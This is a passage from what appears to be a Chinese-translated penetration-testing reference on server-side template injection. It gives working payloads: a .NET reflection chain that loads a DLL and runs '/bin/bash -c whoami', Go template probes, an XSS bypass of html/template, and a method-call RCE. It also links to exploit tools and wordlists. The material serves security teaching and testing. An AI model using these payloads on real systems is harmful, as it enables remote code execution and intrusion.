
更多信息

• https://www.w3schools.com/asp/asp_examples.asp

.Net 绕过限制

.NET Reflection 机制可用于绕过黑名单或处理程序集内不存在的类。DLL's 可以在运行时被加载，并且可以从基本对象访问它们的方法和属性。

Dll's can be loaded with:

• {"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?"))} - 来自文件系统。
• {"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("Load", [typeof(byte[])]).Invoke(null, [Convert.FromBase64String("Base64EncodedDll")])} - 直接来自请求。

完整命令执行：

{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?")).GetType("System.Diagnostics.Process").GetMethods().GetValue(0).Invoke(null, "/bin/bash,-c ""whoami""".Split(","))}

更多信息

• https://efigo.pl/en/blog/cve-2024-9150/

Mojolicious (Perl)

即使是 perl，它使用类似 Ruby 中 ERB 的标签。

• <%= 7*7 %> = 49
• <%= foobar %> = Error

<%= perl code %>
<% perl code %>

SSTI 在 GO 中

在 Go 的模板引擎中，可以使用特定的 payloads 来确认其被使用：

• {{ . }}: 显示传入的数据结构。例如，如果传入的对象有一个 Password 属性，{{ .Password }} 可能暴露它。
• {{printf "%s" "ssti" }}: 预期会显示字符串 "ssti"。
• {{html "ssti"}}, {{js "ssti"}}: 这些 payload 应返回 "ssti"，而不会附加 "html" 或 "js"。更多指令可在 Go 文档中查看 here.

XSS Exploitation

使用 text/template 包时，通过直接插入 payload 就能轻易造成 XSS。相比之下，html/template 包会对响应进行编码以防止这种情况（例如，{{"<script>alert(1)</script>"}} 会得到 <script>alert(1)</script>）。不过，在 Go 中的模板定义和调用可以绕过这种编码： {{define "T1"}}alert(1){{end}} {{template "T1"}}

vbnet Copy code

RCE Exploitation

RCE 的利用在 html/template 和 text/template 之间有显著差异。text/template 模块允许直接调用任何公开函数（使用 “call” 值），而 html/template 则不允许。关于这些模块的文档可在 here for html/template 和 here for text/template 找到。

对于通过 SSTI 在 Go 中实现的 RCE，可以调用对象方法。例如，如果传入的对象有一个用于执行命令的 System 方法，则可像 {{ .System "ls" }} 那样利用它。通常需要访问源代码才能进行此类利用，如下面示例所示：

func (p Person) Secret (test string) string {
out, _ := exec.Command(test).CombinedOutput()
return string(out)
}

更多信息

• https://blog.takemyhand.xyz/2020/06/ssti-breaking-gos-template-engine-to
• https://www.onsecurity.io/blog/go-ssti-method-research/

LESS (CSS 预处理器)

LESS 是一个流行的 CSS 预处理器，添加了变量、mixins、functions 和强大的 @import 指令。在编译过程中，LESS 引擎会在使用 (inline) 选项时获取 @import 语句中引用的资源并将其内容嵌入("inline")到生成的 CSS 中。

{{#ref}} ../xs-search/css-injection/less-code-injection.md {{/ref}}

More Exploits

Check the rest of https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection for more exploits. Also you can find interesting tags information in https://github.com/DiogoMRSilva/websitesVulnerableToSSTI

BlackHat PDF

相关帮助

如果你认为有用，请阅读：

• Flask 技巧
• Python 魔法函数

工具

• https://github.com/Hackmanit/TInjA
• https://github.com/vladko312/sstimap
• https://github.com/epinna/tplmap
• https://github.com/Hackmanit/template-injection-table

暴力破解检测列表

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt

练习与参考

• https://portswigger.net/web-security/server-side-template-injection/exploiting
• https://github.com/DiogoMRSilva/websitesVulnerableToSSTI
• https://portswigger.net/web-security/server-side-template-injection